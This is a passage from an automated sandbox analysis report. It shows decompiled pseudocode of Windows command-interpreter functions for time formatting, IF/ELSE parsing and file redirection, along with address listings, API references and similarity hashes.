						} else {
							_push(0);
							L64:
							_push(_t157);
							E002AC5A2(_t131);
							_t76 = 0;
							goto L8;
						}
					}
				}
				L7:
				_t76 = 1;
				goto L8;
			}




















































                                              0x002ab89c
                                              0x002ab8a7
                                              0x002ab8ae
                                              0x002ab8b5
                                              0x002ab8b7
                                              0x002ab8be
                                              0x002ab8c3
                                              0x002ab8c9
                                              0x002ab8cc
                                              0x002ab8cc
                                              0x002ab8cf
                                              0x002ab8d2
                                              0x002ab8d9
                                              0x002ab8e0
                                              0x002b9da8
                                              0x002b9da8
                                              0x002ab928
                                              0x002ab92b
                                              0x002ab938
                                              0x002ab938
                                              0x002ab8e6
                                              0x002ab8ea
                                              0x002ab8ed
                                              0x002ab8ed
                                              0x002ab8f0
                                              0x002ab8f3
                                              0x002ab8f8
                                              0x002ab900
                                              0x002ab903
                                              0x002ab906
                                              0x002ab90c
                                              0x002ab90e
                                              0x002ab917
                                              0x002b9d99
                                              0x002b9da0
                                              0x002b9da1
                                              0x00000000
                                              0x002b9da7
                                              0x002ab91f
                                              0x002b9daf
                                              0x002b9db1
                                              0x002b9db4
                                              0x002b9db4
                                              0x002b9db7
                                              0x002b9dba
                                              0x002b9dc1
                                              0x002b9dc5
                                              0x002b9dc6
                                              0x002b9dcd
                                              0x002b9dd6
                                              0x002b9ddb
                                              0x002b9dcf
                                              0x002b9dcf
                                              0x002b9dd1
                                              0x002b9dd1
                                              0x002b9ddc
                                              0x002b9de8
                                              0x002b9ded
                                              0x002b9df3
                                              0x002b9dfc
                                              0x002b9e28
                                              0x002b9e29
                                              0x002b9e29
                                              0x002b9e2e
                                              0x002b9e34
                                              0x002b9e34
                                              0x002b9e3a
                                              0x00000000
                                              0x00000000
                                              0x002b9e3f
                                              0x002b9e56
                                              0x002b9e56
                                              0x002b9e5f
                                              0x002b9e61
                                              0x00000000
                                              0x00000000
                                              0x002b9e67
                                              0x002b9e6c
                                              0x002b9e72
                                              0x002b9e72
                                              0x002b9e78
                                              0x00000000
                                              0x00000000
                                              0x002b9e7d
                                              0x002b9e94
                                              0x002b9e94
                                              0x002b9e9d
                                              0x002b9e9f
                                              0x00000000
                                              0x00000000
                                              0x002b9ea5
                                              0x002b9eab
                                              0x002b9eae
                                              0x002b9eae
                                              0x002b9eb1
                                              0x002b9eb4
                                              0x002b9ebd
                                              0x002b9ebf
                                              0x002b9ec1
                                              0x00000000
                                              0x00000000
                                              0x002b9ece
                                              0x002b9fb6
                                              0x002b9fba
                                              0x002b9fbc
                                              0x002b9fbc
                                              0x002b9fbe
                                              0x00000000
                                              0x002b9fbe
                                              0x002b9ed6
                                              0x002b9edf
                                              0x002b9eea
                                              0x002b9eee
                                              0x002b9efb
                                              0x002b9f14
                                              0x002b9fe1
                                              0x002b9fe7
                                              0x002b9fea
                                              0x002b9ff0
                                              0x002b9ff1
                                              0x002b9ffd
                                              0x002b9fff
                                              0x002ba007
                                              0x00000000
                                              0x00000000
                                              0x002ba010
                                              0x00000000
                                              0x00000000
                                              0x002ba018
                                              0x00000000
                                              0x002ba018
                                              0x002b9f21
                                              0x002b9f26
                                              0x002b9f29
                                              0x002b9f2d
                                              0x002b9f2f
                                              0x002b9f2f
                                              0x002b9f35
                                              0x002b9f38
                                              0x002b9f38
                                              0x002b9f3b
                                              0x002b9f3e
                                              0x002b9f49
                                              0x002b9f4d
                                              0x002b9f4f
                                              0x002b9f4f
                                              0x002b9f57
                                              0x002b9f69
                                              0x002b9f6e
                                              0x002b9f73
                                              0x002b9f75
                                              0x002b9f75
                                              0x002b9f7b
                                              0x002b9f8c
                                              0x00000000
                                              0x002b9f8e
                                              0x002b9f8e
                                              0x002b9f9a
                                              0x002b9fa0
                                              0x002b9fa4
                                              0x002b9fa6
                                              0x002b9fa6
                                              0x002b9fab
                                              0x002b9fad
                                              0x002b9fb3
                                              0x00000000
                                              0x002b9fb3
                                              0x002b9f8c
                                              0x002b9e7f
                                              0x002b9e83
                                              0x002b9e87
                                              0x00000000
                                              0x00000000
                                              0x002b9e89
                                              0x002b9e8c
                                              0x002b9e92
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b9e92
                                              0x002b9e98
                                              0x002b9e9a
                                              0x00000000
                                              0x002b9e9a
                                              0x002b9e41
                                              0x002b9e45
                                              0x002b9e49
                                              0x00000000
                                              0x00000000
                                              0x002b9e4b
                                              0x002b9e4e
                                              0x002b9e54
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b9e54
                                              0x002b9e5a
                                              0x002b9e5c
                                              0x00000000
                                              0x002b9fc0
                                              0x002b9fd3
                                              0x002b9fd5
                                              0x00000000
                                              0x002b9dfe
                                              0x002b9e06
                                              0x002b9e08
                                              0x002b9e11
                                              0x00000000
                                              0x002b9e20
                                              0x002b9e20
                                              0x002ba019
                                              0x002ba019
                                              0x002ba01a
                                              0x002ba020
                                              0x00000000
                                              0x002ba022
                                              0x002b9e11
                                              0x002b9dfc
                                              0x002ab925
                                              0x002ab927
                                              0x00000000

                                              APIs
                                              • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FE7,00000000), ref: 002AB90E
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 12f6438e0180281481d01a8194a814d8e05f5da0cc963925e798b4cb07ed4a5a
                                              • Instruction ID: 37b767235923df68617ca352522e76e9748a31d089fe3efd0b602e588aadc187
                                              • Opcode Fuzzy Hash: 12f6438e0180281481d01a8194a814d8e05f5da0cc963925e798b4cb07ed4a5a
                                              • Instruction Fuzzy Hash: 359123729201078BDF24EF28CC856FAB3B5EF54350F5484AADA0AD7241EB319DE1CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002A96A0, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 237timeCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 70%
                                              			E002A96A0(void* __ecx, void* __edx, signed int _a4, unsigned int _a8) {
				signed int _v8;
				short _v76;
				short _v332;
				signed short _v334;
				signed short _v336;
				signed int _v338;
				signed int _v340;
				struct _SYSTEMTIME _v348;
				signed int _v352;
				intOrPtr _v356;
				void* _v360;
				struct _FILETIME _v368;
				struct _FILETIME _v376;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t58;
				char* _t67;
				signed int _t73;
				signed int _t74;
				signed int _t76;
				signed int _t79;
				signed short _t80;
				signed int _t85;
				signed int _t88;
				signed int _t92;
				signed int _t99;
				void* _t106;
				void* _t111;
				signed int _t112;
				signed int _t114;
				void* _t116;
				void* _t119;
				signed int _t121;
				signed int _t122;
				void* _t123;
				signed int _t124;
				signed int _t126;
				signed int _t127;
				intOrPtr* _t131;
				void* _t133;
				int _t134;
				void* _t136;
				signed int _t138;
				signed int _t140;
				signed int _t141;
				void* _t142;

				_t58 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t58 ^ _t141;
				_t139 = _a4;
				_t136 = __edx;
				if(__ecx != 0) {
					E002C3C49(__ecx,  &_v368);
				} else {
					GetSystemTime( &_v348);
					SystemTimeToFileTime( &_v348,  &_v368);
				}
				FileTimeToLocalFileTime( &_v368,  &_v376);
				FileTimeToSystemTime( &_v376,  &_v348);
				if(_t136 != 1) {
					__eflags =  *0x2e3cc9;
					if( *0x2e3cc9 == 0) {
						__eflags =  *0x2cd0cc;
						_t67 = "a";
						_t114 = _v340 & 0x0000ffff;
						if( *0x2cd0cc == 0) {
							_t67 = " ";
						} else {
							__eflags = _t114 - 0xc;
							if(__eflags < 0) {
								__eflags = _t114;
								if(_t114 == 0) {
									_t114 = 0xc;
								}
							} else {
								if(__eflags > 0) {
									__eflags = _t114;
								}
								_t67 = "p";
							}
						}
						_push(_t67);
						_push(_v338 & 0x0000ffff);
						_push(0x2cf81c);
						E002B274C( &_v76, 0x20, L"%02d%s%02d%s", _t114);
						L48:
						__eflags = _t139;
						if(_t139 != 0) {
							_t130 = _a8;
							E002B1040(_t139, _a8,  &_v76);
							_t116 = _t139 + 2;
							do {
								_t73 =  *_t139;
								_t139 = _t139 + 2;
								__eflags = _t73;
							} while (_t73 != 0);
							goto L6;
						}
						_t131 =  &_v76;
						_t119 = _t131 + 2;
						do {
							_t76 =  *_t131;
							_t131 = _t131 + 2;
							__eflags = _t76;
						} while (_t76 != 0);
						_t130 = _t131 - _t119 >> 1;
						_t74 = E002B2616( &_v76, _t131 - _t119 >> 1);
						goto L7;
					}
					_v352 = 0;
					_t79 = GetLocaleInfoW(E002B41A4(), 0x1003,  &_v332, 0x80);
					__eflags = _t79;
					if(_t79 != 0) {
						L20:
						_t80 = _v332;
						_t136 =  &_v332;
						__eflags = _t80;
						if(_t80 == 0) {
							L37:
							_t85 = GetTimeFormatW(E002B41A4(), 2,  &_v348,  &_v332,  &_v76, 0x20);
							__eflags = _t85;
							if(_t85 == 0) {
								_v76 = _t85;
							}
							goto L48;
						}
						_t112 = _t80 & 0x0000ffff;
						_t121 = 0;
						__eflags = 0;
						do {
							__eflags = _t112 - 0x27;
							if(_t112 != 0x27) {
								__eflags = _t121;
								if(_t121 == 0) {
									__eflags = _t112 - 0x68;
									if(_t112 == 0x68) {
										L29:
										_t122 = 0;
										__eflags = 0;
										do {
											_t136 = _t136 + 2;
											_t122 = _t122 + 1;
											__eflags =  *_t136 - _t112;
										} while ( *_t136 == _t112);
										_t133 = _t136 +  ~_t122 * 2;
										_v360 = _t133;
										_t136 = _t133 + 2;
										__eflags = _t122 - 1;
										if(_t122 != 1) {
											L35:
											_t121 = _v352;
											goto L36;
										}
										_t123 = _t133;
										_v356 = _t123 + 2;
										do {
											_t92 =  *_t123;
											_t123 = _t123 + 2;
											__eflags = _t92;
										} while (_t92 != 0);
										_t124 = _t123 - _v356;
										__eflags = _t124;
										memmove(_t136, _t133, 2 + (_t124 >> 1) * 2);
										_t142 = _t142 + 0xc;
										 *_v360 = _t112;
										goto L35;
									}
									__eflags = _t112 - 0x48;
									if(_t112 == 0x48) {
										goto L29;
									}
									__eflags = _t112 - 0x6d;
									if(_t112 != 0x6d) {
										goto L36;
									}
									goto L29;
								}
								_t136 = _t136 + 2;
								goto L36;
							}
							_t136 = _t136 + 2;
							__eflags = _t121;
							_t121 = 0 | _t121 == 0x00000000;
							_v352 = _t121;
							L36:
							_t88 =  *(_t136 + 2) & 0x0000ffff;
							_t136 = _t136 + 2;
							_t112 = _t88;
							__eflags = _t88;
						} while (_t88 != 0);
						goto L37;
					}
					_t126 =  &_v332;
					_t134 = 0x80;
					_t138 = L"HH:mm:ss t" - _t126;
					__eflags = _t138;
					while(1) {
						_t25 = _t134 + 0x7fffff7e; // 0x7ffffffe
						__eflags = _t25;
						if(_t25 == 0) {
							break;
						}
						_t99 =  *(_t138 + _t126) & 0x0000ffff;
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						 *_t126 = _t99;
						_t126 = _t126 + 2;
						_t134 = _t134 - 1;
						__eflags = _t134;
						if(_t134 != 0) {
							continue;
						}
						L18:
						_t126 = _t126 - 2;
						__eflags = _t126;
						L19:
						__eflags = 0;
						 *_t126 = 0;
						goto L20;
					}
					__eflags = _t134;
					if(_t134 != 0) {
						goto L19;
					}
					goto L18;
				} else {
					_t127 = _v334 & 0x0000ffff;
					_t130 = 0xcccccccd * _t127 >> 0x20 >> 3;
					_push(0xcccccccd * _t127 >> 0x20 >> 3);
					_push(0x2cf7fc);
					_push(_v336 & 0x0000ffff);
					_push(0x2cf81c);
					_push(_v338 & 0x0000ffff);
					_push(0x2cf81c);
					_push(_v340 & 0x0000ffff);
					_push(L"%2d%s%02d%s%02d%s%02d");
					if(_t139 == 0) {
						_t74 = E002B25D9();
						L7:
						return E002B6FD0(_t74, _t111, _v8 ^ _t141, _t130, _t136, _t139);
					} else {
						_push(_a8);
						_push(_t139);
						E002B274C();
						_t116 = _t139 + 2;
						do {
							_t106 =  *_t139;
							_t139 = _t139 + 2;
						} while (_t106 != 0);
						L6:
						_t140 = _t139 - _t116;
						_t139 = _t140 >> 1;
						_t74 = _t140 >> 1;
						goto L7;
					}
				}
			}


















































                                              0x002a96ab
                                              0x002a96b2
                                              0x002a96b7
                                              0x002a96bb
                                              0x002a96bf
                                              0x002c0ad6
                                              0x002a96c5
                                              0x002a96cc
                                              0x002a96e0
                                              0x002a96e0
                                              0x002a96f4
                                              0x002a9708
                                              0x002a9711
                                              0x002c0aed
                                              0x002c0af4
                                              0x002c0c53
                                              0x002c0c5a
                                              0x002c0c5f
                                              0x002c0c66
                                              0x002c0c84
                                              0x002c0c68
                                              0x002c0c68
                                              0x002c0c6b
                                              0x002c0c79
                                              0x002c0c7b
                                              0x002c0c7d
                                              0x002c0c7d
                                              0x002c0c6d
                                              0x002c0c6d
                                              0x002c0c6f
                                              0x002c0c6f
                                              0x002c0c72
                                              0x002c0c72
                                              0x002c0c6b
                                              0x002c0c89
                                              0x002c0c91
                                              0x002c0c92
                                              0x002c0ca3
                                              0x002c0cab
                                              0x002c0cab
                                              0x002c0cad
                                              0x002c0cd1
                                              0x002c0cda
                                              0x002c0cdf
                                              0x002c0ce2
                                              0x002c0ce2
                                              0x002c0ce5
                                              0x002c0ce8
                                              0x002c0ce8
                                              0x00000000
                                              0x002c0ced
                                              0x002c0caf
                                              0x002c0cb2
                                              0x002c0cb5
                                              0x002c0cb5
                                              0x002c0cb8
                                              0x002c0cbb
                                              0x002c0cbb
                                              0x002c0cc5
                                              0x002c0cc7
                                              0x00000000
                                              0x002c0cc7
                                              0x002c0b05
                                              0x002c0b1b
                                              0x002c0b21
                                              0x002c0b23
                                              0x002c0b65
                                              0x002c0b65
                                              0x002c0b6c
                                              0x002c0b72
                                              0x002c0b75
                                              0x002c0c27
                                              0x002c0c43
                                              0x002c0c49
                                              0x002c0c4b
                                              0x002c0c4d
                                              0x002c0c4d
                                              0x00000000
                                              0x002c0c4b
                                              0x002c0b7b
                                              0x002c0b7e
                                              0x002c0b7e
                                              0x002c0b80
                                              0x002c0b80
                                              0x002c0b84
                                              0x002c0b9a
                                              0x002c0b9c
                                              0x002c0ba3
                                              0x002c0ba7
                                              0x002c0bb5
                                              0x002c0bb5
                                              0x002c0bb5
                                              0x002c0bb7
                                              0x002c0bb7
                                              0x002c0bba
                                              0x002c0bbb
                                              0x002c0bbb
                                              0x002c0bc4
                                              0x002c0bc7
                                              0x002c0bcd
                                              0x002c0bd0
                                              0x002c0bd3
                                              0x002c0c0f
                                              0x002c0c0f
                                              0x00000000
                                              0x002c0c0f
                                              0x002c0bd5
                                              0x002c0bda
                                              0x002c0be0
                                              0x002c0be0
                                              0x002c0be3
                                              0x002c0be6
                                              0x002c0be6
                                              0x002c0beb
                                              0x002c0beb
                                              0x002c0bfd
                                              0x002c0c09
                                              0x002c0c0c
                                              0x00000000
                                              0x002c0c0c
                                              0x002c0ba9
                                              0x002c0bad
                                              0x00000000
                                              0x00000000
                                              0x002c0baf
                                              0x002c0bb3
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c0bb3
                                              0x002c0b9e
                                              0x00000000
                                              0x002c0b9e
                                              0x002c0b88
                                              0x002c0b8b
                                              0x002c0b90
                                              0x002c0b92
                                              0x002c0c15
                                              0x002c0c15
                                              0x002c0c19
                                              0x002c0c1c
                                              0x002c0c1e
                                              0x002c0c1e
                                              0x00000000
                                              0x002c0b80
                                              0x002c0b25
                                              0x002c0b32
                                              0x002c0b37
                                              0x002c0b37
                                              0x002c0b39
                                              0x002c0b39
                                              0x002c0b3f
                                              0x002c0b41
                                              0x00000000
                                              0x00000000
                                              0x002c0b43
                                              0x002c0b47
                                              0x002c0b4a
                                              0x00000000
                                              0x00000000
                                              0x002c0b4c
                                              0x002c0b4f
                                              0x002c0b52
                                              0x002c0b52
                                              0x002c0b55
                                              0x00000000
                                              0x00000000
                                              0x002c0b5d
                                              0x002c0b5d
                                              0x002c0b5d
                                              0x002c0b60
                                              0x002c0b60
                                              0x002c0b62
                                              0x00000000
                                              0x002c0b62
                                              0x002c0b59
                                              0x002c0b5b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002a9717
                                              0x002a9717
                                              0x002a972c
                                              0x002a972f
                                              0x002a9730
                                              0x002a9735
                                              0x002a973d
                                              0x002a9742
                                              0x002a974a
                                              0x002a974f
                                              0x002a9750
                                              0x002a9757
                                              0x002c0ae0
                                              0x002a9781
                                              0x002a9791
                                              0x002a975d
                                              0x002a975d
                                              0x002a9760
                                              0x002a9761
                                              0x002a9769
                                              0x002a9770
                                              0x002a9770
                                              0x002a9773
                                              0x002a9776
                                              0x002a977b
                                              0x002a977b
                                              0x002a977d
                                              0x002a977f
                                              0x00000000
                                              0x002a977f
                                              0x002a9757

                                              APIs
                                              • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,002CF830,?,00002000), ref: 002A96CC
                                              • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 002A96E0
                                              • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 002A96F4
                                              • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 002A9708
                                              • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00001003,?,00000080), ref: 002C0B1B
                                              • GetTimeFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000002,?,?,?,00000020), ref: 002C0C43
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Time$File$System$FormatInfoLocalLocale
                                              • String ID: %02d%s%02d%s$%2d%s%02d%s%02d%s%02d$HH:mm:ss t
                                              • API String ID: 55602301-2516506544
                                              • Opcode ID: 3785cdbdfa1d7cee8158c4bb434b4bfb214fcd83dc8fc79b9cf36a30a59870ea
                                              • Instruction ID: 5b52075b5f8fac8f5d28b19779726bf6d22e71e4204fe67499b07229a1995a88
                                              • Opcode Fuzzy Hash: 3785cdbdfa1d7cee8158c4bb434b4bfb214fcd83dc8fc79b9cf36a30a59870ea
                                              • Instruction Fuzzy Hash: 4381BF75A2021ADBCB24DF55CC85FFAB378AF54704F04439EE90AA7240EA709FA5CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002AD803, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 212COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 62%
                                              			E002AD803(void* __eax, WCHAR* __ebx, void* __ecx) {
				void* __edi;
				void* __esi;
				short _t56;
				short _t57;
				signed int _t59;
				intOrPtr* _t62;
				intOrPtr _t63;
				signed int _t66;
				signed int _t68;
				signed int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				signed int _t76;
				void* _t81;
				signed int _t85;
				signed int _t86;
				WCHAR* _t90;
				signed int _t91;
				void* _t92;
				WCHAR* _t93;
				signed int _t100;
				WCHAR* _t104;
				void* _t105;
				void* _t110;
				void* _t114;
				signed int _t118;
				signed int _t125;
				WCHAR* _t132;
				void* _t138;
				signed int _t140;
				void* _t144;
				void* _t150;
				void* _t156;
				WCHAR* _t157;
				void* _t160;
				signed int _t162;
				signed int _t165;
				signed int _t166;
				void* _t167;
				void* _t168;
				void* _t170;
				signed int _t171;
				signed int _t173;
				void* _t174;
				signed int _t175;
				signed int _t177;
				signed int _t180;

				_t104 = __ebx;
				_t157 = 0;
				__imp___wcsicmp(L"IF/?", 0x2dfaa0, _t156, _t170, __ecx);
				_t186 = __eax;
				if(__eax == 0) {
					 *0x2dfaa4 = 0;
					_t157 = 1;
				}
				_t110 = 0x2c;
				_t171 = E002AE9A0(_t110, _t186);
				if(_t157 != 0) {
					_t56 = 0x2f;
					 *0x2dfaa0 = _t56;
					_t57 = 0x3f;
					 *0x2dfaa2 = _t57;
					 *0x2dfaa4 = 0;
				} else {
					E002AF030(0);
				}
				_t149 = 0x2c;
				_t59 = E002ADCE1(_t104, _t149, _t157);
				if(_t59 != 0) {
					 *(_t171 + 0x38) =  *(_t171 + 0x38) & 0x00000000;
					 *_t171 = 0x3c;
					goto L13;
				} else {
					_t160 = 0;
					if( *0x2e3cc9 == _t59) {
						L6:
						_t149 = 0;
						E002AF300(_t59, 0, 0, 0);
					} else {
						__imp___wcsicmp(0x2dfaa0, L"/I");
						if(_t59 == 0) {
							_t160 = 1;
						} else {
							goto L6;
						}
					}
					_t62 = E002ACDA2(0);
					 *((intOrPtr*)(_t171 + 0x3c)) = _t62;
					if(_t62 != 0 && _t160 != 0) {
						__eflags =  *_t62 - 0x38;
						if( *_t62 == 0x38) {
							_t62 =  *((intOrPtr*)(_t62 + 0x3c));
						}
						 *((intOrPtr*)(_t62 + 0x40)) = 2;
					}
					_t114 = 0x2c;
					_t63 = E002ADC74(_t104, _t114);
					 *((intOrPtr*)(_t171 + 0x40)) = _t63;
					if(_t63 == 0) {
						E002C82EB(_t114);
					}
					if(E002AEEC8() == 0) {
						L13:
						return _t171;
					} else {
						_t66 = E002AF030(0);
						__imp___wcsicmp(L"ELSE", 0x2dfaa0);
						if(_t66 == 0) {
							_t118 =  *0x2dfa8c +  *0x2dfa8c;
							_t68 = E002B00B0(_t118);
							__eflags = _t68;
							if(_t68 == 0) {
								E002C9287(_t118);
								__imp__longjmp(0x2db8b8, 1);
								asm("int3");
								while(1) {
									L58:
									 *((short*)(_t149 + _t118 * 2)) = 0;
									while(1) {
										_t71 =  *(_t171 + 0x14);
										_t171 = _t71;
										__eflags = _t71;
										if(_t71 == 0) {
											break;
										}
										_t119 =  *(_t171 + 4);
										_t162 =  *(_t171 + 4);
										_t150 = _t162 + 2;
										do {
											_t72 =  *_t162;
											_t162 = _t162 + 2;
											__eflags = _t72 - _t104;
										} while (_t72 != _t104);
										_t73 = E002B22C0(_t104, _t119);
										_t149 = (_t162 - _t150 >> 1) + 1;
										E002B1040( *(_t171 + 4), (_t162 - _t150 >> 1) + 1, _t73);
										__eflags =  *((intOrPtr*)(_t171 + 8)) - _t104;
										if( *((intOrPtr*)(_t171 + 8)) == _t104) {
											_t149 =  *(_t171 + 4);
											_t140 = _t149;
											_t168 = _t140 + 2;
											do {
												_t75 =  *_t140;
												_t140 = _t140 + 2;
												__eflags = _t75 - _t104;
											} while (_t75 != _t104);
											_t118 = (_t140 - _t168 >> 1) - 1;
											__eflags = _t118 - 1;
											if(_t118 > 1) {
												__eflags =  *((short*)(_t149 + _t118 * 2)) - 0x3a;
												if( *((short*)(_t149 + _t118 * 2)) == 0x3a) {
													goto L58;
												}
											}
										}
									}
									_t165 =  *(_t180 - 0x228);
									_t173 =  *(_t180 - 0x224);
									__eflags = _t173 - 3;
									if(_t173 == 3) {
										_t76 =  *0x2e3cd4;
										 *(_t180 - 0x228) = _t76;
										goto L33;
									} else {
										_t138 = 0x10;
										_t76 = E002B00B0(_t138);
										 *(_t180 - 0x228) = _t76;
										__eflags = _t76;
										if(_t76 == 0) {
											L52:
											_t104 = 1;
										} else {
											 *(_t76 + 0xc) =  *0x2e3cd4;
											 *0x2e3cd4 = _t76;
											 *(_t76 + 8) = _t165;
											 *_t76 = _t173;
											L33:
											_t166 =  *(_t165 + 0x34);
											__eflags = _t166;
											if(_t166 != 0) {
												_t175 = _t173 | 0xffffffff;
												__eflags = _t175;
												do {
													__eflags =  *(_t166 + 8) - _t104;
													if( *(_t166 + 8) != _t104) {
														goto L48;
													} else {
														__imp___get_osfhandle( *_t166);
														__eflags = _t76 - _t175;
														if(_t76 == _t175) {
															L63:
															 *(_t166 + 8) = _t175;
															goto L41;
														} else {
															__imp___get_osfhandle( *_t166);
															__eflags = _t76 - 0xfffffffe;
															if(_t76 == 0xfffffffe) {
																goto L63;
															} else {
																_t92 = E002B0178(_t76);
																__eflags = _t92;
																if(_t92 == 0) {
																	_t92 = E002C9953(_t92,  *_t166);
																	__eflags = _t92;
																	if(_t92 != 0) {
																		goto L39;
																	} else {
																		__imp___get_osfhandle( *_t166, _t104, _t104, 1);
																		_pop(_t136);
																		_t92 = SetFilePointer(_t92, ??, ??, ??);
																		__eflags = _t92 - _t175;
																		if(_t92 != _t175) {
																			goto L39;
																		} else {
																			E002B274C(0x2e3d00, 0x104, L"%d",  *_t166);
																			_push(0x2e3d00);
																			_push(1);
																			_push(0x40002721);
																			goto L75;
																		}
																	}
																} else {
																	L39:
																	_t136 =  *_t166;
																	_t93 = E002ADBCE(_t92,  *_t166);
																	 *(_t166 + 8) = _t93;
																	__eflags = _t93 - _t175;
																	if(_t93 == _t175) {
																		E002B274C(0x2e3d00, 0x104, L"%d",  *_t166);
																		_push(0x2e3d00);
																		_push(1);
																		_push(0x2344);
																		L75:
																		E002AC5A2(_t136);
																		 *(_t166 + 8) = _t104;
																		E002AD937();
																		goto L52;
																	} else {
																		E002ADB92( *_t166);
																		L41:
																		_t125 =  *(_t166 + 4);
																		__eflags =  *_t125 - 0x26;
																		if( *_t125 == 0x26) {
																			 *((short*)(_t125 + 4)) = 0;
																			_t149 =  *_t166;
																			_t127 = (( *(_t166 + 4))[1] & 0x0000ffff) - 0x30;
																			_t81 = E002ADBFC((( *(_t166 + 4))[1] & 0x0000ffff) - 0x30,  *_t166);
																			__eflags = _t81 - _t175;
																			if(_t81 != _t175) {
																				goto L48;
																			} else {
																				goto L76;
																			}
																		} else {
																			__eflags =  *((short*)(_t166 + 0x10)) - 0x3c;
																			_push(_t125);
																			if( *((short*)(_t166 + 0x10)) == 0x3c) {
																				_t149 = 0x8000;
																				_t85 = E002AD120(_t125, 0x8000);
																				 *(_t180 - 0x224) = _t85;
																				__eflags = _t85 - _t175;
																				if(_t85 != _t175) {
																					goto L45;
																				} else {
																					_t90 = E002B3320(L"DPATH");
																					__eflags = _t90;
																					if(_t90 == 0) {
																						goto L77;
																					} else {
																						_t132 =  *(_t180 - 0x18);
																						__eflags = _t132;
																						if(_t132 == 0) {
																							_t132 = _t180 - 0x220;
																						}
																						_t91 = SearchPathW(_t90,  *(_t166 + 4), _t104,  *(_t180 - 0x10), _t132, _t104);
																						__eflags = _t91;
																						if(_t91 == 0) {
																							goto L77;
																						} else {
																							_t125 =  *(_t180 - 0x18);
																							__eflags = _t125;
																							if(_t125 == 0) {
																								_t125 = _t180 - 0x220;
																							}
																							_push(_t125);
																							_t149 = 0x8000;
																							goto L44;
																						}
																					}
																				}
																			} else {
																				asm("sbb edx, edx");
																				_t149 = ( ~( *(_t166 + 0xc)) & 0xfffffe09) + 0x301;
																				__eflags = ( ~( *(_t166 + 0xc)) & 0xfffffe09) + 0x301;
																				L44:
																				_t85 = E002AD120(_t125, _t149);
																				 *(_t180 - 0x224) = _t85;
																				__eflags = _t85 - _t175;
																				if(_t85 == _t175) {
																					L77:
																					E002AD937();
																					E002C985A( *0x2e3cf0);
																					goto L52;
																				} else {
																					L45:
																					__eflags = _t85 -  *_t166;
																					if(_t85 !=  *_t166) {
																						_t149 =  *_t166;
																						_t86 = E002ADBFC(_t85,  *_t166);
																						_t127 =  *(_t180 - 0x224);
																						_t177 = _t86;
																						E002ADB92( *(_t180 - 0x224));
																						__eflags = _t177 - 0xffffffff;
																						if(_t177 == 0xffffffff) {
																							L76:
																							E002AD937();
																							E002B274C(0x2e3d00, 0x104, L"%d",  *_t166);
																							E002AC5A2(_t127, 0x2344, 1, 0x2e3d00);
																							goto L52;
																						} else {
																							_t85 =  *_t166;
																							_t175 = _t177 | 0xffffffff;
																							goto L46;
																						}
																					} else {
																						L46:
																						__eflags = _t85 - _t175;
																						if(_t85 == _t175) {
																							goto L77;
																						} else {
																							 *( *(_t180 - 0x228) + 4) = _t85;
																							goto L48;
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
													goto L49;
													L48:
													_t76 =  *(_t166 + 0x14);
													_t166 = _t76;
													__eflags = _t76;
												} while (_t76 != 0);
											}
										}
									}
									L49:
									__imp__??_V@YAXPAX@Z( *(_t180 - 0x18));
									_pop(_t167);
									_pop(_t174);
									__eflags =  *(_t180 - 4) ^ _t180;
									_pop(_t105);
									return E002B6FD0(_t104, _t105,  *(_t180 - 4) ^ _t180, _t149, _t167, _t174);
									goto L78;
								}
							} else {
								 *(_t171 + 0x44) = _t68;
								E002B1040(_t68,  *0x2dfa8c, 0x2dfaa0);
								_t144 = 0x2c;
								_t100 = E002ADC74(_t104, _t144);
								 *(_t171 + 0x48) = _t100;
								__eflags = _t100;
								if(_t100 == 0) {
									E002C82EB(_t144);
								}
								goto L13;
							}
						} else {
							E002AF300(_t66, 0, 0, 0);
							goto L13;
						}
					}
				}
				L78:
			}



















































                                              0x002ad803
                                              0x002ad812
                                              0x002ad814
                                              0x002ad81c
                                              0x002ad81e
                                              0x002bb9cf
                                              0x002bb9d5
                                              0x002bb9d5
                                              0x002ad826
                                              0x002ad82c
                                              0x002ad830
                                              0x002bb9dd
                                              0x002bb9de
                                              0x002bb9e6
                                              0x002bb9e7
                                              0x002bb9ef
                                              0x002ad836
                                              0x002ad838
                                              0x002ad838
                                              0x002ad83f
                                              0x002ad840
                                              0x002ad847
                                              0x002bb9fa
                                              0x002bb9fe
                                              0x00000000
                                              0x002ad84d
                                              0x002ad84d
